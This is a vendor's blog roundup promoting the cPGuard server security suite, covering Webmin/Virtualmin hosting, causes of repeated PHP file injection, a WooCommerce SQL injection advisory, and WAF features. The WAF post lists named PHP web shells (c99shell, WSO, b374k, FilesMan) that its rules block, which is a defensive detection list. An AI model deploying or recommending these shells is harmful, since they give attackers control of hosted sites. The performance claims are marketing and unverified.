Secure websites in Webmin/Virtualmin, Webmin antivirus/antimalware

Secure websites in Webmin/Virtualmin, Webmin antivirus/antimalware

by | Nov 21, 2022 | Uncategorized

Secure Webmin/Virtualmin Hosting

Nowadays it is very challenging to keep the websites on your server safe and secure. You can always expect an attack or attempt to compromise your website by attackers, especially towards popular CMS like WordPress. So it is laborious for every web host or server owner to keep updated and defend against such attacks and keep your websites safe.

How cPGuard can help you to secure websites on your Webmin/Virtualmin server?

All the modules in the cPGuard Security Suite work side by side to protect your websites from attacks. It secures your server in various layers, blocks invasion attempts, reduces server load and overhead, and helps to drastically reduce your admin hours dealing with attacks and compromised websites. Given below are some of the cPGuard modules that protect your server

  1. File Scanner – This module will act as an antivirus/antimalware for websites hosted in Webmin/Virtualmin. Integrated with its cleanup module, this will help to detect and wipe malicious file uploads and injections to your websites
  2. Web Application Firewall – cPGuards ModSecurity Web Application Firewall rules will stop all generic web attacks against your websites before they even begin. The commercial WAF rules by Malware.Expert protects your Webmin/Virtualmin client websites by effectively blocking generic web attacks, specific web attacks, and bot attacks and more.
  3. Distributed system firewall – The IPDB distributed system firewall for Webmin/Virtualmin can block traffic from known and active source IPs. This firewall for Webmin/Virtualmin is very much effective to block many attacks even before they reach your application server and thereby reduce your server overhead as well.
  4. Reputation monitoring – The reputation monitoring module will help to keep an eye on the status of your IP address and domains and alert you if they are listed on blacklists.

There are many other functionalities integrated within cPGuard to help you run your server securely and cleanly. Please read more about the features list at https://opsshield.com/standalone.html

If you wish to secure your Webmin/Virtualmin server, please follow the installation instructions. Installation is pretty simple and we have pre-built templates to support Webmin/Virtualmin servers.

Given below is cPGuard installation sample steps on  a Webmin/Virtualmin server.

Repeated PHP File Injections

Repeated PHP File Injections

by | Aug 22, 2022 | CPGUARD, Most Popular

Injecting bad code into a legitimate file or inserting a bad file into an application folder is a very common type of virus attack. But there are some specific cases where repeated file injection happens to the same file or folder. In such cases even if the scanner detects and take action against the detected instance, it may happen again and causes a scanner log flood. In this blog, we are discussing some common reasons that can cause such issues based on the cases that we handled in the past.

1. Cron Jobs

This is a very common type of cause for repeated file injections and is easy to find. In this scenario, the user account is compromised and the attacker is taking advantage of it to install malicious cron jobs to repeatedly inject files into the account.

Given below is an active campaign specifically targeting to cPanel account, where the compromised cPanel accounts through some campaign are being abused with similar cron jobs for the past couple of weeks.

There can be other types of cron jobs as well, which will download the file from a remote location and execute it. This will run as a daemon on the server which will monitor and upload/update malicious code into the account.

2. Process or Daemon run under the user account

This type of abuse is also common and a bit more aggressive than the scheduled cron-based injections. As it is a running process, it actively tracks any change to the targeted infected file or location and adds infection if it cannot find the bad code in it. This type of abuse is easy to find because the bad process keeps running and consumes resources. You can easily track such jobs by listing the processes owned by the affected user using “ps” command. Few such examples are given below…

cPGuard has a process monitoring module integrated, which will peridiocally scan the processes running under the user accounts, take action and report them if  matches to any of the known abuse patterns.

3. Using hidden code in nulled third-party modules

This is another method and is difficult to find because it needs source code verification of all files within the account. This often happens with nulled WordPress plugins/themes which the users often install to save some money. But such packages will cause more damage and can ultimately turn your website not unable and vulnerable. You need to go through each files or use  a malware scanner like cPGuard to find such hidden malicious code. An example for such case is given below, which will run every time you access th website and include malcious code into the index.php file

Conclusion

The reason for repeated file infection is not just limited to this but can happen due to other reasons as well. But these are the most common reason behind repeated infections and cPGuard is being trained to handle many such cases already. But ultilamtely it is required to find the security hole using which the hacker got access to the account and patch it. Otherwise the attacker can come back any time and repeat the action.

SQL Injection Vulnerability Discovered in WooCommerce – Generic SQL Injection Attacks

SQL Injection Vulnerability Discovered in WooCommerce – Generic SQL Injection Attacks

by | Jul 22, 2021 | Others

On 15th July 2021, a critical SQL-injection security vulnerability in the WooCommerce e-commerce platform and a related plugin was reported which might affect millions of websites around the world. The vulnerabilities were detected on the 13th of July and fixed in WooCommerce versions 3.3.6 to 5.5.1 and WooCommerce Blocks versions 2.5.16 to 5.5.1. Though they pushed a forced automatic update to all affected websites, it is recommended to manually check your website and make sure that everything is up to date.

What is the exploit impact? As per the announcement from WooCommerce, this vulnerability allows an unauthenticated attacker to access arbitrary data in an online store’s database. If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information

So what is an SQL Injection attack and how to prevent it? SQL injection is a web security vulnerability that allows an attacker to interfere with the SQL queries that an application makes to its database. This type of vulnerability allows a malicious hacker to affect the database in a way that makes it display information or behave differently in ways it’s not supposed to. This is a common attack vector and can be mostly detected using some website auditing tools. The developer of every application must do proper validation of the user input through any form or from the URI and filter them properly.

Can cPGuard protect your website from such vulnerabilities? Yes, the cPGuard WAF is powered by Malware.Expert ModSec rules set can protect your websites from such generic attacks including SQL injection. So cPGuard can already defend against such attacks and protect your websites. It also works along with the IPDB Distributed  Firewall module which can detect and block the repeated attacking IPs on all our customer servers. 

Do we really need resource comsumption settings for cPGuard?

Do we really need resource comsumption settings for cPGuard?

by | Mar 27, 2021 | CPGUARD

What do you mean by resource consumption?

Every software needs some resources to run on a system and perform its operations. The amount of resources each program need is different and depends on the task it performs. Softwares that need to run multiple algorithms, do complex computations and has a lot of file and network operations are usually highly resource-intensive (specifically CPU, RAM and Disk IO). An anti-virus scanner come under this category as there are a large number of file read writes, content analysis, pattern recognition and comparisons to be performed.

On a server environment resources and limited and required to be available on-demand for the servers primary task. Therefore antivirus scanners have settings to adjust the resources it can consume or schedule the scanner to run in off-peak hours.

So why cPGuard does not allow users to limit it?

We have strictly maintained a “performance-oriented” approach while building cPGuard and wanted it to run smoothly on the smallest of servers. The cPGuard scanner engine core is built to work fast and consume minimal resources. Some of the major points that help us achieve better performance with lower resources are

  • We scan only relevant files/locations, unlike the competitors where they scan a lot of unnecessary locations and waste server resources.
  • Our core scanner is single-threaded and will not cause a total server spike. So CPU limiting is not required for our scanner daemon
  • Our highly efficient and optimised algorithms leave only a very small memory footprint.
  • Our IPDB rules contain only active attack sources and thus load only minimal rules and reduce network overhead
  • WAF contains only minimal but generic rules which effectively block most and major web attacks

Do you have any proof?

Yes, we have and we can confidently claim our statement. The biggest proof is that in the last 4 years the complaints due to resource usage are close to ZERO. The major portion of most systems that can cause a load spike on the server is the scanner module. Our scanner is fine-tuned to avoid such a scenario and it is one of the fastest scanners available in the market. It is tested and confirmed that the cPGuard scanner engine is more than 7x faster than that of our competitors. The screenshot below of the manual scan option in cPGuard, where it completed scanning 41K+ files in just 7 mins.

 

So is there any advantage with Resource Consumption settings?

Yes, there is if the scanner module is resource hungry. It will help to reduce server load but it will drastically slow down the scanning process and will engage resources for a longer time. As I stated earlier, that is not a problem with cPGuard and you do not need to worry about setting up such values and monitoring our services.

Ok, I have few more questions…

We are happy to address them…feel free to reach our support team and we will be more than happy to answer your questions!

What are the advantages of cPGuard WAF compared to competing solutions?

What are the advantages of cPGuard WAF compared to competing solutions?

by | Mar 15, 2021 | Others

What is cPGuard WAF?

The cPGuard WAF module is an important part of cPGuard security suite to protect your websites from malicious traffic and attacks. It is powered by Malware.Expert commercial ModSec rules and are loaded with a wide variety of protection levels. With cPGuard, you can implement the WAF rules quite easily and flexibly and enforce maximum website protection based on your preference. We have rules to protect major attack like the following which is well explained in the following sections

 

  1. WordPress/Joomla and other CMS brute-force attacks
  2. Crawler bots  and exploit/vulnerability scanner prevention
  3. Generic attacks like XSS, SQL injection, WP abuses, etc
  4. Block malicious files upload via web
  5. Zero-day exploits blocking
    etc

What are the important modules of cPGuard WAF?

The cPGuard WAF consists of various types of rules and each can stop different types of attacks. The major advantage in enabling the WAF with cPGuard is, you can select the set of rules that you wish to enable for your websites. So unlike the competing WAF solutions, our rules are quite wisely separated and let the customers to choose the protection level.

  • RBL Protection:- This provides the advanced DDoS protection for POST attacks [ brute-force, script exploits ] and blocks common abusive IP addresses collected through our network of servers with cPGuard installed. We recommend turning this ON if you are getting too many POST attacks as it can help to block many attacks before reaching your application and helps to reduce server load.
  •  Captcha Protection :-  Recommended This ruleset will enforce all users to verify not as bot before accessing the CMS [ like WordPress, Joomla, etc ] login pages or submitting the login credentials. Once they are identified as a real user, they will be able to login to their website. This can greatly reduce the load due to brute-force attacks. You can also define the set of URIs that you wish to protect using the captcha system, which makes the protection more powerful and flexible.
  • WEBSHELL protection:- If you enable this ruleset, your server will be protected from the execution of PHP shells like following
    • Phoenix WebShell
    • FilesMan
    • c99shell
    • b374k
    • WSO
    • Ani-Shell

    Frontpage may open in web shells, but command execution [ like a copy, delete, move, etc ] is blocked. You can enable this rules set if you control all the web apps on your server.

  • SCANNER protection:-  Recommended This will help to keep away bad crawlers from your system. This is a major headache for web hosts and causes unnecessary use of system resources. It can block
    • Bad User-Agents
    • Bad search engine crawlers (Cause High loads)

In addition to the above rules set, the WAF consists of rules to stop brute-force attacks and to enable web-based files scanning.

Why cPGuard WAF is better than the competing WAF solutions?

Our WAF is top-notch to block major automated attacks with less server load compared to the competing WAF solutions. In addition, we cause very minimal or zero false positives in most cases with an option to whitelist rules if they find any isolated issues with any rules.

In general, cPGuard WAF outperform all other competing WAF solutions based on the following points

  • We have very minimal but generic WAF rules. That helps to offer a wide range of protection with very little server load
  • Rules are generic and thus can block the same types of attacks with different vectors
  • We carefully watch the latest exploits and release rules to protect them
  • We have explicit generic rules to protect common CMS systems
  • Our Captcha protection system is one of the best which can stop all brute-force and bot attacks towards your CMSes
  • Cloud-based central system to analyze the latest web threats and to block them 
  • The WAF module is clubbed with IPDB Firewall in the core which will eventually help to stop attacks in the system firewall even before it reaches the application server

Have more questions?

In case you are misleaded by some marketing emails about our software and WAF module and would like to know more, please feel free to reach us. Our team is always happy to answer your questions and explain about the cPGuard software